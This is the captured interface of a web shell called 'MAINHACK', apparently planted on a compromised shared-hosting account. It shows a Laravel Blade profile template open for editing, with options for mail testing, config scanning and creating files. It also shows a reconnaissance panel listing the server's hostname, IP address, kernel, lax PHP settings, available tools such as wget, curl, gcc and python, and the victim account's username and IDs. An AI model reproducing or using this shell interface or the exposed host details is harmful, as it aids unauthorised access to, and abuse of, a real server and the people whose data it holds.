[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: 9b81c7dabbfc80bc5dcc046534f2c8ed76d76236.php
<?php if($user->offline): ?> <div class="user-offline-alert d-flex mt-40"> <div class="p-15"> <h3 class="font-16 text-dark-blue"><?php echo e(trans('public.instructor_is_not_available')); ?></h3> <p class="font-14 font-weight-500 text-gray mt-15"><?php echo e($user->offline_message); ?></p> </div> <div class="offline-icon offline-icon-right ml-auto d-flex align-items-stretch"> <div class="d-flex align-items-center"> <img src="/assets/default/img/profile/time-icon.png" alt="offline"> </div> </div> </div> <?php endif; ?> <?php if((!empty($educations) and !$educations->isEmpty()) or (!empty($experiences) and !$experiences->isEmpty()) or (!empty($occupations) and !$occupations->isEmpty()) or !empty($user->about)): ?> <?php if(!empty($educations) and !$educations->isEmpty()): ?> <div class="mt-40"> <h3 class="font-16 text-dark-blue font-weight-bold"><?php echo e(trans('site.education')); ?></h3> <ul class="list-group-custom"> <?php $__currentLoopData = $educations; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $education): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?> <li class="mt-15 text-gray"><?php echo e($education->value); ?></li> <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?> </ul> </div> <?php endif; ?> <?php if(!empty($experiences) and !$experiences->isEmpty()): ?> <div class="mt-40"> <h3 class="font-16 text-dark-blue font-weight-bold"><?php echo e(trans('site.experiences')); ?></h3> <ul class="list-group-custom"> <?php $__currentLoopData = $experiences; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $experience): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?> <li class="mt-15 text-gray"><?php echo e($experience->value); ?></li> <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?> </ul> </div> <?php endif; ?> <?php if(!empty($user->about)): ?> <div class="mt-40"> <h3 class="font-16 text-dark-blue font-weight-bold"><?php echo e(trans('site.about')); ?></h3> <div class="mt-30"> <?php echo nl2br($user->about); ?> </div> </div> <?php endif; ?> <?php if(!empty($occupations) and !$occupations->isEmpty()): ?> <div class="mt-40"> <h3 class="font-16 text-dark-blue font-weight-bold"><?php echo e(trans('site.occupations')); ?></h3> <div class="d-flex flex-wrap align-items-center pt-10"> <?php $__currentLoopData = $occupations; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $occupation): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?> <div class="bg-gray200 font-14 rounded mt-10 px-10 py-5 text-gray mr-15"><?php echo e($occupation->category->title); ?></div> <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?> </div> </div> <?php endif; ?> <?php else: ?> <?php echo $__env->make(getTemplate() . '.includes.no-result',[ 'file_name' => 'bio.png', 'title' => trans('site.not_create_bio'), 'hint' => '', ], \Illuminate\Support\Arr::except(get_defined_vars(), ['__data', '__path']))->render(); ?> <?php endif; ?> <?php /**PATH /home/aoneqssk/public_html/resources/views/web/default/user/profile_tabs/about.blade.php ENDPATH**/ ?>
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: premium320.web-hosting.com
Server IP: 66.29.153.54
PHP Version: 8.2.29
Server Software: LiteSpeed
System: Linux premium320.web-hosting.com 4.18.0-553.50.1.lve.el8.x86_64 #1 SMP Thu Apr 17 19:10:24 UTC 2025 x86_64
HDD Total: 97.87 GB
HDD Free: 76.85 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
No
git:
Yes
User Info
Username: aoneqssk
User ID (UID): 1285
Group ID (GID): 1290
Script Owner UID: 1285
Current Dir Owner: 1285